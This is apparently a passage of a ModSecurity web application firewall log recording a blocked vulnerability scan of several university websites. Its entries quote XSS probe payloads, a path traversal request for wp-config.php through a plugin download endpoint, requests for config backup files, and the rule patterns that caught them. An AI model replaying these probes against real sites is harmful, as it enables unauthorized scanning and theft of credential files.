"ZO16DcCo-f0AAAqQ@uYAAAAB"]
[Tue Aug 29 11:54:38.015820 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DsCo-f0AAAqdbmgAAAAw"]
[Tue Aug 29 11:54:38.057385 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DsCo-f0AAApV23kAAAAJ"]
[Tue Aug 29 11:54:38.237722 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DsCo-f0AAApbUVcAAAAh"]
[Tue Aug 29 11:54:38.677169 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16DsCo-f0AAAor7xkAAAAk"]
[Tue Aug 29 11:54:38.682936 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DsCo-f0AAApgA0oAAAAH"]
[Tue Aug 29 11:54:38.688603 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16DsCo-f0AAAofnFEAAAAX"]
[Tue Aug 29 11:54:38.778955 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16DsCo-f0AAApl@BcAAAAo"]
[Tue Aug 29 11:54:38.788670 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16DsCo-f0AAAoz78AAAAAS"]
[Tue Aug 29 11:54:39.298721 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_4e184a1dd403d6e2d6be4b21ef44b99c064457cd"): Internal error [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16DsCo-f0AAAph8x0AAAAj"]
[Tue Aug 29 11:54:39.299525 2023] [:error] [pid 2707] [client ::1] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_805d299efc49e63d0731214e13ae1523d643a5fb"): Internal error [hostname "unla-WEB.unla.ac.id"] [uri "*"] [unique_id "ZO16D8Co-f0AAAqTvkIAAAAa"]
[Tue Aug 29 11:54:39.531233 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16D8Co-f0AAAqWwXQAAAAl"]
[Tue Aug 29 11:54:39.766193 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_cb955ad0647d3651c348d2641017377fe3d6211a"): Internal error [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16D8Co-f0AAAqWwXQAAAAl"]
[Tue Aug 29 11:54:40.072573 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16EMCo-f0AAApgA00AAAAH"]
[Tue Aug 29 11:54:40.186670 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_cb955ad0647d3651c348d2641017377fe3d6211a"): Internal error [hostname "journal.unla.ac.id"] [uri "/web.config.back"] [unique_id "ZO16D8Co-f0AAAoz78EAAAAS"]
[Tue Aug 29 11:54:40.312060 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_4ff59d53ecff7ab5b17c5d9254966911e5882e5e"): Internal error [hostname "www.unla.ac.id"] [uri "/<script>alert(document.domain)</script>"] [unique_id "ZO16D8Co-f0AAApk-W0AAAAn"]
[Tue Aug 29 11:54:40.314617 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_d7f9fdf39193610aaa5fc6cb072e72086210c23b"): Internal error [hostname "informatika.unla.ac.id"] [uri "/config.inc.php-sample.php"] [unique_id "ZO16D8Co-f0AAAqUB3IAAAAb"]
[Tue Aug 29 11:54:40.316605 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_4ff59d53ecff7ab5b17c5d9254966911e5882e5e"): Internal error [hostname "informatika.unla.ac.id"] [uri "/web.config.copy"] [unique_id "ZO16D8Co-f0AAApV23wAAAAJ"]
[Tue Aug 29 11:54:40.317529 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_1eea905f7d282aa5957c78190e760de321c2b972"): Internal error [hostname "journal.unla.ac.id"] [uri "/config.inc.php-good"] [unique_id "ZO16D8Co-f0AAApa-FcAAAAg"]
[Tue Aug 29 11:54:40.529638 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAApbUVwAAAAh"]
[Tue Aug 29 11:54:40.540592 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAoz78MAAAAS"]
[Tue Aug 29 11:54:40.541473 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAqTvkUAAAAa"]
[Tue Aug 29 11:54:40.547718 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAofnFUAAAAX"]
[Tue Aug 29 11:54:40.550215 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAqeFPkAAAAx"]
[Tue Aug 29 11:54:41.553250 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAqQ@u0AAAAB"]
[Tue Aug 29 11:54:41.572976 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAAqTvkgAAAAa"]
[Tue Aug 29 11:54:41.573630 2023] [:error] [pid 2713] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAqZuacAAAAs"]
[Tue Aug 29 11:54:41.575153 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAAqWwXkAAAAl"]
[Tue Aug 29 11:54:41.599449 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAqTvkkAAAAa"]
[Tue Aug 29 11:54:41.599775 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EcCo-f0AAAqhN8oAAAAE"]
[Tue Aug 29 11:54:41.609169 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAqY56gAAAAr"]
[Tue Aug 29 11:54:41.630236 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAqWwXsAAAAl"]
[Tue Aug 29 11:54:41.630795 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAApgA1EAAAAH"]
[Tue Aug 29 11:54:41.635677 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAApk-XUAAAAn"]
[Tue Aug 29 11:54:41.640126 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAAqY56kAAAAr"]
